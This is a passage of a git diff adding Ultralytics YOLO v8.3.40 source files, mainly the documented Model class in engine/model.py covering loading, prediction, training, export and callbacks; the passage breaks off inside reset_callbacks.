Example YOLO command with this new custom cfg: + # yolo cfg='/path/to/current/directory/default_copy.yaml' imgsz=320 batch=8 + + Notes: + - The new configuration file is created in the current working directory. + - After copying, the function prints a message with the new file's location and an example + YOLO command demonstrating how to use the new configuration file. + - This function is useful for users who want to modify the default configuration without + altering the original file. + """ + new_file = Path.cwd() / DEFAULT_CFG_PATH.name.replace(".yaml", "_copy.yaml") + shutil.copy2(DEFAULT_CFG_PATH, new_file) + LOGGER.info( + f"{DEFAULT_CFG_PATH} copied to {new_file}\n" + f"Example YOLO command with this new custom cfg:\n yolo cfg='{new_file}' imgsz=320 batch=8" + ) + + +if __name__ == "__main__": + # Example: entrypoint(debug='yolo predict model=yolo11n.pt') + entrypoint(debug="") diff --git a/2024.ultralytics/v8.3.40/engine/model.py b/2024.ultralytics/v8.3.40/engine/model.py new file mode 100644 index 0000000..874613d --- /dev/null +++ b/2024.ultralytics/v8.3.40/engine/model.py @@ -0,0 +1,1174 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import inspect +from pathlib import Path +from typing import Dict, List, Union + +import numpy as np +import torch +from PIL import Image + +from ultralytics.cfg import TASK2DATA, get_cfg, get_save_dir +from ultralytics.engine.results import Results +from ultralytics.hub import HUB_WEB_ROOT, HUBTrainingSession +from ultralytics.nn.tasks import attempt_load_one_weight, guess_model_task, nn, yaml_model_load +from ultralytics.utils import ( + ARGV, + ASSETS, + DEFAULT_CFG_DICT, + LOGGER, + RANK, + SETTINGS, + callbacks, + checks, + emojis, + yaml_load, +) + + +class Model(nn.Module): + """ + A base class for implementing YOLO models, unifying APIs across different model types. + + This class provides a common interface for various operations related to YOLO models, such as training, + validation, prediction, exporting, and benchmarking. It handles different types of models, including those + loaded from local files, Ultralytics HUB, or Triton Server. + + Attributes: + callbacks (Dict): A dictionary of callback functions for various events during model operations. + predictor (BasePredictor): The predictor object used for making predictions. + model (nn.Module): The underlying PyTorch model. + trainer (BaseTrainer): The trainer object used for training the model. + ckpt (Dict): The checkpoint data if the model is loaded from a *.pt file. + cfg (str): The configuration of the model if loaded from a *.yaml file. + ckpt_path (str): The path to the checkpoint file. + overrides (Dict): A dictionary of overrides for model configuration. + metrics (Dict): The latest training/validation metrics. + session (HUBTrainingSession): The Ultralytics HUB session, if applicable. + task (str): The type of task the model is intended for. + model_name (str): The name of the model. + + Methods: + __call__: Alias for the predict method, enabling the model instance to be callable. + _new: Initializes a new model based on a configuration file. + _load: Loads a model from a checkpoint file. + _check_is_pytorch_model: Ensures that the model is a PyTorch model. + reset_weights: Resets the model's weights to their initial state. + load: Loads model weights from a specified file. + save: Saves the current state of the model to a file. + info: Logs or returns information about the model. + fuse: Fuses Conv2d and BatchNorm2d layers for optimized inference. + predict: Performs object detection predictions. + track: Performs object tracking. + val: Validates the model on a dataset. + benchmark: Benchmarks the model on various export formats. + export: Exports the model to different formats. + train: Trains the model on a dataset. + tune: Performs hyperparameter tuning. + _apply: Applies a function to the model's tensors. + add_callback: Adds a callback function for an event. + clear_callback: Clears all callbacks for an event. + reset_callbacks: Resets all callbacks to their default functions. + + Examples: + >>> from ultralytics import YOLO + >>> model = YOLO("yolo11n.pt") + >>> results = model.predict("image.jpg") + >>> model.train(data="coco8.yaml", epochs=3) + >>> metrics = model.val() + >>> model.export(format="onnx") + """ + + def __init__( + self, + model: Union[str, Path] = "yolo11n.pt", + task: str = None, + verbose: bool = False, + ) -> None: + """ + Initializes a new instance of the YOLO model class. + + This constructor sets up the model based on the provided model path or name. It handles various types of + model sources, including local files, Ultralytics HUB models, and Triton Server models. The method + initializes several important attributes of the model and prepares it for operations like training, + prediction, or export. + + Args: + model (Union[str, Path]): Path or name of the model to load or create. Can be a local file path, a + model name from Ultralytics HUB, or a Triton Server model. + task (str | None): The task type associated with the YOLO model, specifying its application domain. + verbose (bool): If True, enables verbose output during the model's initialization and subsequent + operations. + + Raises: + FileNotFoundError: If the specified model file does not exist or is inaccessible. + ValueError: If the model file or configuration is invalid or unsupported. + ImportError: If required dependencies for specific model types (like HUB SDK) are not installed. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model = Model("path/to/model.yaml", task="detect") + >>> model = Model("hub_model", verbose=True) + """ + super().__init__() + self.callbacks = callbacks.get_default_callbacks() + self.predictor = None # reuse predictor + self.model = None # model object + self.trainer = None # trainer object + self.ckpt = None # if loaded from *.pt + self.cfg = None # if loaded from *.yaml + self.ckpt_path = None + self.overrides = {} # overrides for trainer object + self.metrics = None # validation/training metrics + self.session = None # HUB session + self.task = task # task type + model = str(model).strip() + + # Check if Ultralytics HUB model from https://hub.ultralytics.com + if self.is_hub_model(model): + # Fetch model from HUB + checks.check_requirements("hub-sdk>=0.0.12") + session = HUBTrainingSession.create_session(model) + model = session.model_file + if session.train_args: # training sent from HUB + self.session = session + + # Check if Triton Server model + elif self.is_triton_model(model): + self.model_name = self.model = model + return + + # Load or create new YOLO model + if Path(model).suffix in {".yaml", ".yml"}: + self._new(model, task=task, verbose=verbose) + else: + self._load(model, task=task) + + # Delete super().training for accessing self.model.training + del self.training + + def __call__( + self, + source: Union[str, Path, int, Image.Image, list, tuple, np.ndarray, torch.Tensor] = None, + stream: bool = False, + **kwargs, + ) -> list: + """ + Alias for the predict method, enabling the model instance to be callable for predictions. + + This method simplifies the process of making predictions by allowing the model instance to be called + directly with the required arguments. + + Args: + source (str | Path | int | PIL.Image | np.ndarray | torch.Tensor | List | Tuple): The source of + the image(s) to make predictions on. Can be a file path, URL, PIL image, numpy array, PyTorch + tensor, or a list/tuple of these. + stream (bool): If True, treat the input source as a continuous stream for predictions. + **kwargs (Any): Additional keyword arguments to configure the prediction process. + + Returns: + (List[ultralytics.engine.results.Results]): A list of prediction results, each encapsulated in a + Results object. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model("https://ultralytics.com/images/bus.jpg") + >>> for r in results: + ... print(f"Detected {len(r)} objects in image") + """ + return self.predict(source, stream, **kwargs) + + @staticmethod + def is_triton_model(model: str) -> bool: + """ + Checks if the given model string is a Triton Server URL. + + This static method determines whether the provided model string represents a valid Triton Server URL by + parsing its components using urllib.parse.urlsplit(). + + Args: + model (str): The model string to be checked. + + Returns: + (bool): True if the model string is a valid Triton Server URL, False otherwise. + + Examples: + >>> Model.is_triton_model("http://localhost:8000/v2/models/yolov8n") + True + >>> Model.is_triton_model("yolo11n.pt") + False + """ + from urllib.parse import urlsplit + + url = urlsplit(model) + return url.netloc and url.path and url.scheme in {"http", "grpc"} + + @staticmethod + def is_hub_model(model: str) -> bool: + """ + Check if the provided model is an Ultralytics HUB model. + + This static method determines whether the given model string represents a valid Ultralytics HUB model + identifier. + + Args: + model (str): The model string to check. + + Returns: + (bool): True if the model is a valid Ultralytics HUB model, False otherwise. + + Examples: + >>> Model.is_hub_model("https://hub.ultralytics.com/models/MODEL") + True + >>> Model.is_hub_model("yolo11n.pt") + False + """ + return model.startswith(f"{HUB_WEB_ROOT}/models/") + + def _new(self, cfg: str, task=None, model=None, verbose=False) -> None: + """ + Initializes a new model and infers the task type from the model definitions. + + This method creates a new model instance based on the provided configuration file. It loads the model + configuration, infers the task type if not specified, and initializes the model using the appropriate + class from the task map. + + Args: + cfg (str): Path to the model configuration file in YAML format. + task (str | None): The specific task for the model. If None, it will be inferred from the config. + model (torch.nn.Module | None): A custom model instance. If provided, it will be used instead of creating + a new one. + verbose (bool): If True, displays model information during loading. + + Raises: + ValueError: If the configuration file is invalid or the task cannot be inferred. + ImportError: If the required dependencies for the specified task are not installed. + + Examples: + >>> model = Model() + >>> model._new("yolov8n.yaml", task="detect", verbose=True) + """ + cfg_dict = yaml_model_load(cfg) + self.cfg = cfg + self.task = task or guess_model_task(cfg_dict) + self.model = (model or self._smart_load("model"))(cfg_dict, verbose=verbose and RANK == -1) # build model + self.overrides["model"] = self.cfg + self.overrides["task"] = self.task + + # Below added to allow export from YAMLs + self.model.args = {**DEFAULT_CFG_DICT, **self.overrides} # combine default and model args (prefer model args) + self.model.task = self.task + self.model_name = cfg + + def _load(self, weights: str, task=None) -> None: + """ + Loads a model from a checkpoint file or initializes it from a weights file. + + This method handles loading models from either .pt checkpoint files or other weight file formats. It sets + up the model, task, and related attributes based on the loaded weights. + + Args: + weights (str): Path to the model weights file to be loaded. + task (str | None): The task associated with the model. If None, it will be inferred from the model. + + Raises: + FileNotFoundError: If the specified weights file does not exist or is inaccessible. + ValueError: If the weights file format is unsupported or invalid. + + Examples: + >>> model = Model() + >>> model._load("yolo11n.pt") + >>> model._load("path/to/weights.pth", task="detect") + """ + if weights.lower().startswith(("https://", "http://", "rtsp://", "rtmp://", "tcp://")): + weights = checks.check_file(weights, download_dir=SETTINGS["weights_dir"]) # download and return local file + weights = checks.check_model_file_from_stem(weights) # add suffix, i.e. yolov8n -> yolov8n.pt + + if Path(weights).suffix == ".pt": + self.model, self.ckpt = attempt_load_one_weight(weights) + self.task = self.model.args["task"] + self.overrides = self.model.args = self._reset_ckpt_args(self.model.args) + self.ckpt_path = self.model.pt_path + else: + weights = checks.check_file(weights) # runs in all cases, not redundant with above call + self.model, self.ckpt = weights, None + self.task = task or guess_model_task(weights) + self.ckpt_path = weights + self.overrides["model"] = weights + self.overrides["task"] = self.task + self.model_name = weights + + def _check_is_pytorch_model(self) -> None: + """ + Checks if the model is a PyTorch model and raises a TypeError if it's not. + + This method verifies that the model is either a PyTorch module or a .pt file. It's used to ensure that + certain operations that require a PyTorch model are only performed on compatible model types. + + Raises: + TypeError: If the model is not a PyTorch module or a .pt file. The error message provides detailed + information about supported model formats and operations. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model._check_is_pytorch_model() # No error raised + >>> model = Model("yolov8n.onnx") + >>> model._check_is_pytorch_model() # Raises TypeError + """ + pt_str = isinstance(self.model, (str, Path)) and Path(self.model).suffix == ".pt" + pt_module = isinstance(self.model, nn.Module) + if not (pt_module or pt_str): + raise TypeError( + f"model='{self.model}' should be a *.pt PyTorch model to run this method, but is a different format. " + f"PyTorch models can train, val, predict and export, i.e. 'model.train(data=...)', but exported " + f"formats like ONNX, TensorRT etc. only support 'predict' and 'val' modes, " + f"i.e. 'yolo predict model=yolov8n.onnx'.\nTo run CUDA or MPS inference please pass the device " + f"argument directly in your inference command, i.e. 'model.predict(source=..., device=0)'" + ) + + def reset_weights(self) -> "Model": + """ + Resets the model's weights to their initial state. + + This method iterates through all modules in the model and resets their parameters if they have a + 'reset_parameters' method. It also ensures that all parameters have 'requires_grad' set to True, + enabling them to be updated during training. + + Returns: + (Model): The instance of the class with reset weights. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model.reset_weights() + """ + self._check_is_pytorch_model() + for m in self.model.modules(): + if hasattr(m, "reset_parameters"): + m.reset_parameters() + for p in self.model.parameters(): + p.requires_grad = True + return self + + def load(self, weights: Union[str, Path] = "yolo11n.pt") -> "Model": + """ + Loads parameters from the specified weights file into the model. + + This method supports loading weights from a file or directly from a weights object. It matches parameters by + name and shape and transfers them to the model. + + Args: + weights (Union[str, Path]): Path to the weights file or a weights object. + + Returns: + (Model): The instance of the class with loaded weights. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = Model() + >>> model.load("yolo11n.pt") + >>> model.load(Path("path/to/weights.pt")) + """ + self._check_is_pytorch_model() + if isinstance(weights, (str, Path)): + self.overrides["pretrained"] = weights # remember the weights for DDP training + weights, self.ckpt = attempt_load_one_weight(weights) + self.model.load(weights) + return self + + def save(self, filename: Union[str, Path] = "saved_model.pt") -> None: + """ + Saves the current model state to a file. + + This method exports the model's checkpoint (ckpt) to the specified filename. It includes metadata such as + the date, Ultralytics version, license information, and a link to the documentation. + + Args: + filename (Union[str, Path]): The name of the file to save the model to. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model.save("my_model.pt") + """ + self._check_is_pytorch_model() + from copy import deepcopy + from datetime import datetime + + from ultralytics import __version__ + + updates = { + "model": deepcopy(self.model).half() if isinstance(self.model, nn.Module) else self.model, + "date": datetime.now().isoformat(), + "version": __version__, + "license": "AGPL-3.0 License (https://ultralytics.com/license)", + "docs": "https://docs.ultralytics.com", + } + torch.save({**self.ckpt, **updates}, filename) + + def info(self, detailed: bool = False, verbose: bool = True): + """ + Logs or returns model information. + + This method provides an overview or detailed information about the model, depending on the arguments + passed. It can control the verbosity of the output and return the information as a list. + + Args: + detailed (bool): If True, shows detailed information about the model layers and parameters. + verbose (bool): If True, prints the information. If False, returns the information as a list. + + Returns: + (List[str]): A list of strings containing various types of information about the model, including + model summary, layer details, and parameter counts. Empty if verbose is True. + + Raises: + TypeError: If the model is not a PyTorch model. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model.info() # Prints model summary + >>> info_list = model.info(detailed=True, verbose=False) # Returns detailed info as a list + """ + self._check_is_pytorch_model() + return self.model.info(detailed=detailed, verbose=verbose) + + def fuse(self): + """ + Fuses Conv2d and BatchNorm2d layers in the model for optimized inference. + + This method iterates through the model's modules and fuses consecutive Conv2d and BatchNorm2d layers + into a single layer. This fusion can significantly improve inference speed by reducing the number of + operations and memory accesses required during forward passes. + + The fusion process typically involves folding the BatchNorm2d parameters (mean, variance, weight, and + bias) into the preceding Conv2d layer's weights and biases. This results in a single Conv2d layer that + performs both convolution and normalization in one step. + + Raises: + TypeError: If the model is not a PyTorch nn.Module. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model.fuse() + >>> # Model is now fused and ready for optimized inference + """ + self._check_is_pytorch_model() + self.model.fuse() + + def embed( + self, + source: Union[str, Path, int, list, tuple, np.ndarray, torch.Tensor] = None, + stream: bool = False, + **kwargs, + ) -> list: + """ + Generates image embeddings based on the provided source. + + This method is a wrapper around the 'predict()' method, focusing on generating embeddings from an image + source. It allows customization of the embedding process through various keyword arguments. + + Args: + source (str | Path | int | List | Tuple | np.ndarray | torch.Tensor): The source of the image for + generating embeddings. Can be a file path, URL, PIL image, numpy array, etc. + stream (bool): If True, predictions are streamed. + **kwargs (Any): Additional keyword arguments for configuring the embedding process. + + Returns: + (List[torch.Tensor]): A list containing the image embeddings. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> image = "https://ultralytics.com/images/bus.jpg" + >>> embeddings = model.embed(image) + >>> print(embeddings[0].shape) + """ + if not kwargs.get("embed"): + kwargs["embed"] = [len(self.model.model) - 2] # embed second-to-last layer if no indices passed + return self.predict(source, stream, **kwargs) + + def predict( + self, + source: Union[str, Path, int, Image.Image, list, tuple, np.ndarray, torch.Tensor] = None, + stream: bool = False, + predictor=None, + **kwargs, + ) -> List[Results]: + """ + Performs predictions on the given image source using the YOLO model. + + This method facilitates the prediction process, allowing various configurations through keyword arguments. + It supports predictions with custom predictors or the default predictor method. The method handles different + types of image sources and can operate in a streaming mode. + + Args: + source (str | Path | int | PIL.Image | np.ndarray | torch.Tensor | List | Tuple): The source + of the image(s) to make predictions on. Accepts various types including file paths, URLs, PIL + images, numpy arrays, and torch tensors. + stream (bool): If True, treats the input source as a continuous stream for predictions. + predictor (BasePredictor | None): An instance of a custom predictor class for making predictions. + If None, the method uses a default predictor. + **kwargs (Any): Additional keyword arguments for configuring the prediction process. + + Returns: + (List[ultralytics.engine.results.Results]): A list of prediction results, each encapsulated in a + Results object. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.predict(source="path/to/image.jpg", conf=0.25) + >>> for r in results: + ... print(r.boxes.data) # print detection bounding boxes + + Notes: + - If 'source' is not provided, it defaults to the ASSETS constant with a warning. + - The method sets up a new predictor if not already present and updates its arguments with each call. + - For SAM-type models, 'prompts' can be passed as a keyword argument. + """ + if source is None: + source = ASSETS + LOGGER.warning(f"WARNING ⚠️ 'source' is missing. Using 'source={source}'.") + + is_cli = (ARGV[0].endswith("yolo") or ARGV[0].endswith("ultralytics")) and any( + x in ARGV for x in ("predict", "track", "mode=predict", "mode=track") + ) + + custom = {"conf": 0.25, "batch": 1, "save": is_cli, "mode": "predict"} # method defaults + args = {**self.overrides, **custom, **kwargs} # highest priority args on the right + prompts = args.pop("prompts", None) # for SAM-type models + + if not self.predictor: + self.predictor = (predictor or self._smart_load("predictor"))(overrides=args, _callbacks=self.callbacks) + self.predictor.setup_model(model=self.model, verbose=is_cli) + else: # only update args if predictor is already setup + self.predictor.args = get_cfg(self.predictor.args, args) + if "project" in args or "name" in args: + self.predictor.save_dir = get_save_dir(self.predictor.args) + if prompts and hasattr(self.predictor, "set_prompts"): # for SAM-type models + self.predictor.set_prompts(prompts) + return self.predictor.predict_cli(source=source) if is_cli else self.predictor(source=source, stream=stream) + + def track( + self, + source: Union[str, Path, int, list, tuple, np.ndarray, torch.Tensor] = None, + stream: bool = False, + persist: bool = False, + **kwargs, + ) -> List[Results]: + """ + Conducts object tracking on the specified input source using the registered trackers. + + This method performs object tracking using the model's predictors and optionally registered trackers. It handles + various input sources such as file paths or video streams, and supports customization through keyword arguments. + The method registers trackers if not already present and can persist them between calls. + + Args: + source (Union[str, Path, int, List, Tuple, np.ndarray, torch.Tensor], optional): Input source for object + tracking. Can be a file path, URL, or video stream. + stream (bool): If True, treats the input source as a continuous video stream. Defaults to False. + persist (bool): If True, persists trackers between different calls to this method. Defaults to False. + **kwargs (Any): Additional keyword arguments for configuring the tracking process. + + Returns: + (List[ultralytics.engine.results.Results]): A list of tracking results, each a Results object. + + Raises: + AttributeError: If the predictor does not have registered trackers. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.track(source="path/to/video.mp4", show=True) + >>> for r in results: + ... print(r.boxes.id) # print tracking IDs + + Notes: + - This method sets a default confidence threshold of 0.1 for ByteTrack-based tracking. + - The tracking mode is explicitly set in the keyword arguments. + - Batch size is set to 1 for tracking in videos. + """ + if not hasattr(self.predictor, "trackers"): + from ultralytics.trackers import register_tracker + + register_tracker(self, persist) + kwargs["conf"] = kwargs.get("conf") or 0.1 # ByteTrack-based method needs low confidence predictions as input + kwargs["batch"] = kwargs.get("batch") or 1 # batch-size 1 for tracking in videos + kwargs["mode"] = "track" + return self.predict(source=source, stream=stream, **kwargs) + + def val( + self, + validator=None, + **kwargs, + ): + """ + Validates the model using a specified dataset and validation configuration. + + This method facilitates the model validation process, allowing for customization through various settings. It + supports validation with a custom validator or the default validation approach. The method combines default + configurations, method-specific defaults, and user-provided arguments to configure the validation process. + + Args: + validator (ultralytics.engine.validator.BaseValidator | None): An instance of a custom validator class for + validating the model. + **kwargs (Any): Arbitrary keyword arguments for customizing the validation process. + + Returns: + (ultralytics.utils.metrics.DetMetrics): Validation metrics obtained from the validation process. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.val(data="coco8.yaml", imgsz=640) + >>> print(results.box.map) # Print mAP50-95 + """ + custom = {"rect": True} # method defaults + args = {**self.overrides, **custom, **kwargs, "mode": "val"} # highest priority args on the right + + validator = (validator or self._smart_load("validator"))(args=args, _callbacks=self.callbacks) + validator(model=self.model) + self.metrics = validator.metrics + return validator.metrics + + def benchmark( + self, + **kwargs, + ): + """ + Benchmarks the model across various export formats to evaluate performance. + + This method assesses the model's performance in different export formats, such as ONNX, TorchScript, etc. + It uses the 'benchmark' function from the ultralytics.utils.benchmarks module. The benchmarking is + configured using a combination of default configuration values, model-specific arguments, method-specific + defaults, and any additional user-provided keyword arguments. + + Args: + **kwargs (Any): Arbitrary keyword arguments to customize the benchmarking process. These are combined with + default configurations, model-specific arguments, and method defaults. Common options include: + - data (str): Path to the dataset for benchmarking. + - imgsz (int | List[int]): Image size for benchmarking. + - half (bool): Whether to use half-precision (FP16) mode. + - int8 (bool): Whether to use int8 precision mode. + - device (str): Device to run the benchmark on (e.g., 'cpu', 'cuda'). + - verbose (bool): Whether to print detailed benchmark information. + + Returns: + (Dict): A dictionary containing the results of the benchmarking process, including metrics for + different export formats. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.benchmark(data="coco8.yaml", imgsz=640, half=True) + >>> print(results) + """ + self._check_is_pytorch_model() + from ultralytics.utils.benchmarks import benchmark + + custom = {"verbose": False} # method defaults + args = {**DEFAULT_CFG_DICT, **self.model.args, **custom, **kwargs, "mode": "benchmark"} + return benchmark( + model=self, + data=kwargs.get("data"), # if no 'data' argument passed set data=None for default datasets + imgsz=args["imgsz"], + half=args["half"], + int8=args["int8"], + device=args["device"], + verbose=kwargs.get("verbose"), + ) + + def export( + self, + **kwargs, + ) -> str: + """ + Exports the model to a different format suitable for deployment. + + This method facilitates the export of the model to various formats (e.g., ONNX, TorchScript) for deployment + purposes. It uses the 'Exporter' class for the export process, combining model-specific overrides, method + defaults, and any additional arguments provided. + + Args: + **kwargs (Dict): Arbitrary keyword arguments to customize the export process. These are combined with + the model's overrides and method defaults. Common arguments include: + format (str): Export format (e.g., 'onnx', 'engine', 'coreml'). + half (bool): Export model in half-precision. + int8 (bool): Export model in int8 precision. + device (str): Device to run the export on. + workspace (int): Maximum memory workspace size for TensorRT engines. + nms (bool): Add Non-Maximum Suppression (NMS) module to model. + simplify (bool): Simplify ONNX model. + + Returns: + (str): The path to the exported model file. + + Raises: + AssertionError: If the model is not a PyTorch model. + ValueError: If an unsupported export format is specified. + RuntimeError: If the export process fails due to errors. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> model.export(format="onnx", dynamic=True, simplify=True) + 'path/to/exported/model.onnx' + """ + self._check_is_pytorch_model() + from .exporter import Exporter + + custom = { + "imgsz": self.model.args["imgsz"], + "batch": 1, + "data": None, + "device": None, # reset to avoid multi-GPU errors + "verbose": False, + } # method defaults + args = {**self.overrides, **custom, **kwargs, "mode": "export"} # highest priority args on the right + return Exporter(overrides=args, _callbacks=self.callbacks)(model=self.model) + + def train( + self, + trainer=None, + **kwargs, + ): + """ + Trains the model using the specified dataset and training configuration. + + This method facilitates model training with a range of customizable settings. It supports training with a + custom trainer or the default training approach. The method handles scenarios such as resuming training + from a checkpoint, integrating with Ultralytics HUB, and updating model and configuration after training. + + When using Ultralytics HUB, if the session has a loaded model, the method prioritizes HUB training + arguments and warns if local arguments are provided. It checks for pip updates and combines default + configurations, method-specific defaults, and user-provided arguments to configure the training process. + + Args: + trainer (BaseTrainer | None): Custom trainer instance for model training. If None, uses default. + **kwargs (Any): Arbitrary keyword arguments for training configuration. Common options include: + data (str): Path to dataset configuration file. + epochs (int): Number of training epochs. + batch_size (int): Batch size for training. + imgsz (int): Input image size. + device (str): Device to run training on (e.g., 'cuda', 'cpu'). + workers (int): Number of worker threads for data loading. + optimizer (str): Optimizer to use for training. + lr0 (float): Initial learning rate. + patience (int): Epochs to wait for no observable improvement for early stopping of training. + + Returns: + (Dict | None): Training metrics if available and training is successful; otherwise, None. + + Raises: + AssertionError: If the model is not a PyTorch model. + PermissionError: If there is a permission issue with the HUB session. + ModuleNotFoundError: If the HUB SDK is not installed. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.train(data="coco8.yaml", epochs=3) + """ + self._check_is_pytorch_model() + if hasattr(self.session, "model") and self.session.model.id: # Ultralytics HUB session with loaded model + if any(kwargs): + LOGGER.warning("WARNING ⚠️ using HUB training arguments, ignoring local training arguments.") + kwargs = self.session.train_args # overwrite kwargs + + checks.check_pip_update_available() + + overrides = yaml_load(checks.check_yaml(kwargs["cfg"])) if kwargs.get("cfg") else self.overrides + custom = { + # NOTE: handle the case when 'cfg' includes 'data'. + "data": overrides.get("data") or DEFAULT_CFG_DICT["data"] or TASK2DATA[self.task], + "model": self.overrides["model"], + "task": self.task, + } # method defaults + args = {**overrides, **custom, **kwargs, "mode": "train"} # highest priority args on the right + if args.get("resume"): + args["resume"] = self.ckpt_path + + self.trainer = (trainer or self._smart_load("trainer"))(overrides=args, _callbacks=self.callbacks) + if not args.get("resume"): # manually set model only if not resuming + self.trainer.model = self.trainer.get_model(weights=self.model if self.ckpt else None, cfg=self.model.yaml) + self.model = self.trainer.model + + self.trainer.hub_session = self.session # attach optional HUB session + self.trainer.train() + # Update model and cfg after training + if RANK in {-1, 0}: + ckpt = self.trainer.best if self.trainer.best.exists() else self.trainer.last + self.model, _ = attempt_load_one_weight(ckpt) + self.overrides = self.model.args + self.metrics = getattr(self.trainer.validator, "metrics", None) # TODO: no metrics returned by DDP + return self.metrics + + def tune( + self, + use_ray=False, + iterations=10, + *args, + **kwargs, + ): + """ + Conducts hyperparameter tuning for the model, with an option to use Ray Tune. + + This method supports two modes of hyperparameter tuning: using Ray Tune or a custom tuning method. + When Ray Tune is enabled, it leverages the 'run_ray_tune' function from the ultralytics.utils.tuner module. + Otherwise, it uses the internal 'Tuner' class for tuning. The method combines default, overridden, and + custom arguments to configure the tuning process. + + Args: + use_ray (bool): If True, uses Ray Tune for hyperparameter tuning. Defaults to False. + iterations (int): The number of tuning iterations to perform. Defaults to 10. + *args (List): Variable length argument list for additional arguments. + **kwargs (Dict): Arbitrary keyword arguments. These are combined with the model's overrides and defaults. + + Returns: + (Dict): A dictionary containing the results of the hyperparameter search. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.tune(use_ray=True, iterations=20) + >>> print(results) + """ + self._check_is_pytorch_model() + if use_ray: + from ultralytics.utils.tuner import run_ray_tune + + return run_ray_tune(self, max_samples=iterations, *args, **kwargs) + else: + from .tuner import Tuner + + custom = {} # method defaults + args = {**self.overrides, **custom, **kwargs, "mode": "train"} # highest priority args on the right + return Tuner(args=args, _callbacks=self.callbacks)(model=self, iterations=iterations) + + def _apply(self, fn) -> "Model": + """ + Applies a function to model tensors that are not parameters or registered buffers. + + This method extends the functionality of the parent class's _apply method by additionally resetting the + predictor and updating the device in the model's overrides. It's typically used for operations like + moving the model to a different device or changing its precision. + + Args: + fn (Callable): A function to be applied to the model's tensors. This is typically a method like + to(), cpu(), cuda(), half(), or float(). + + Returns: + (Model): The model instance with the function applied and updated attributes. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model = model._apply(lambda t: t.cuda()) # Move model to GPU + """ + self._check_is_pytorch_model() + self = super()._apply(fn) # noqa + self.predictor = None # reset predictor as device may have changed + self.overrides["device"] = self.device # was str(self.device) i.e. device(type='cuda', index=0) -> 'cuda:0' + return self + + @property + def names(self) -> Dict[int, str]: + """ + Retrieves the class names associated with the loaded model. + + This property returns the class names if they are defined in the model. It checks the class names for validity + using the 'check_class_names' function from the ultralytics.nn.autobackend module. If the predictor is not + initialized, it sets it up before retrieving the names. + + Returns: + (Dict[int, str]): A dict of class names associated with the model. + + Raises: + AttributeError: If the model or predictor does not have a 'names' attribute. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> print(model.names) + {0: 'person', 1: 'bicycle', 2: 'car', ...} + """ + from ultralytics.nn.autobackend import check_class_names + + if hasattr(self.model, "names"): + return check_class_names(self.model.names) + if not self.predictor: # export formats will not have predictor defined until predict() is called + self.predictor = self._smart_load("predictor")(overrides=self.overrides, _callbacks=self.callbacks) + self.predictor.setup_model(model=self.model, verbose=False) + return self.predictor.model.names + + @property + def device(self) -> torch.device: + """ + Retrieves the device on which the model's parameters are allocated. + + This property determines the device (CPU or GPU) where the model's parameters are currently stored. It is + applicable only to models that are instances of nn.Module. + + Returns: + (torch.device): The device (CPU/GPU) of the model. + + Raises: + AttributeError: If the model is not a PyTorch nn.Module instance. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> print(model.device) + device(type='cuda', index=0) # if CUDA is available + >>> model = model.to("cpu") + >>> print(model.device) + device(type='cpu') + """ + return next(self.model.parameters()).device if isinstance(self.model, nn.Module) else None + + @property + def transforms(self): + """ + Retrieves the transformations applied to the input data of the loaded model. + + This property returns the transformations if they are defined in the model. The transforms + typically include preprocessing steps like resizing, normalization, and data augmentation + that are applied to input data before it is fed into the model. + + Returns: + (object | None): The transform object of the model if available, otherwise None. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> transforms = model.transforms + >>> if transforms: + ... print(f"Model transforms: {transforms}") + ... else: + ... print("No transforms defined for this model.") + """ + return self.model.transforms if hasattr(self.model, "transforms") else None + + def add_callback(self, event: str, func) -> None: + """ + Adds a callback function for a specified event. + + This method allows registering custom callback functions that are triggered on specific events during + model operations such as training or inference. Callbacks provide a way to extend and customize the + behavior of the model at various stages of its lifecycle. + + Args: + event (str): The name of the event to attach the callback to. Must be a valid event name recognized + by the Ultralytics framework. + func (Callable): The callback function to be registered. This function will be called when the + specified event occurs. + + Raises: + ValueError: If the event name is not recognized or is invalid. + + Examples: + >>> def on_train_start(trainer): + ... print("Training is starting!") + >>> model = YOLO("yolo11n.pt") + >>> model.add_callback("on_train_start", on_train_start) + >>> model.train(data="coco8.yaml", epochs=1) + """ + self.callbacks[event].append(func) + + def clear_callback(self, event: str) -> None: + """ + Clears all callback functions registered for a specified event. + + This method removes all custom and default callback functions associated with the given event. + It resets the callback list for the specified event to an empty list, effectively removing all + registered callbacks for that event. + + Args: + event (str): The name of the event for which to clear the callbacks. This should be a valid event name + recognized by the Ultralytics callback system. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> model.add_callback("on_train_start", lambda: print("Training started")) + >>> model.clear_callback("on_train_start") + >>> # All callbacks for 'on_train_start' are now removed + + Notes: + - This method affects both custom callbacks added by the user and default callbacks + provided by the Ultralytics framework. + - After calling this method, no callbacks will be executed for the specified event + until new ones are added. + - Use with caution as it removes all callbacks, including essential ones that might + be required for proper functioning of certain operations. + """ + self.callbacks[event] = [] + + def reset_callbacks(self) -> None: + """ + Resets all callbacks to their default functions. + + This method reinstates the default callback functions for all 